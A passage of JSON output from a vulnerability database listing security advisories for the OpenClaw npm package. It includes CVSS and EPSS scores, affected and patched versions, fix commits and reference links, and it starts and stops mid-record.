-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-j
e9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/op
enclaw@2026.3.2"}],"aliases":["CVE-2026-35658","GHSA-cfp9-w5v9-3q4h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4hcw-cv74-zkah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89638?format=json","vulnerability_id":"VCID-4hz5-f2pw-3yb4","summary":"OpenClaw: Unauthenticated plugin-auth HTTP routes receive operator runtime scopes\n## Summary\nUnauthenticated plugin-auth HTTP routes receive operator runtime scopes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still gives auth:\"plugin\" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a1db0c0f1fa375004a95ba0ef030534790a6d47` — 2026-04-01T00:20:49+09:00\n\nOpenClaw thanks @davidluzsilva for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41394","reference_id":"","reference_type":"","scores":[{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.26999","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27037","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27045","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41394"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvss
v3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41394","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41394"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-scope-access-in-unauthenticated-plugin-auth-routes","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-sc
ope-access-in-unauthenticated-plugin-auth-routes"},{"reference_url":"https://github.com/advisories/GHSA-mhgq-xpfq-6r66","reference_id":"GHSA-mhgq-xpfq-6r66","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mhgq-xpfq-6r66"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"
VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"
VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41394","GHSA-mhgq-xpfq-6r66"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4hz5-f2pw-3yb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90990?format=json","vulnerability_id":"VCID-4jwj-6s5z-wbeq","summary":"OpenClaw: Zalo channel downloads media before sender authorization\n## Summary\n\nThe Zalo image path fetched and stored inbound media before the DM/pairing authorization checks ran.\n\n## Impact\n\nUnauthorized senders could force network fetches and disk writes in the inbound media store even when the message itself was rejected.\n\n## Affected Component\n\n`extensions/zalo/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `68ceaf7a5f` (`zalo: gate image downloads before DM auth`).\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33576","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04589","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04575","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.0499","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33576"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"}],"url":"https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_ele
ments":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33576","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33576"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel"},{"reference_url":"https://github.com/advisories/GHSA-v2v2
-f783-358j","reference_id":"GHSA-v2v2-f783-358j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v2v2-f783-358j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vuln
erability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vuln
erability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vuln
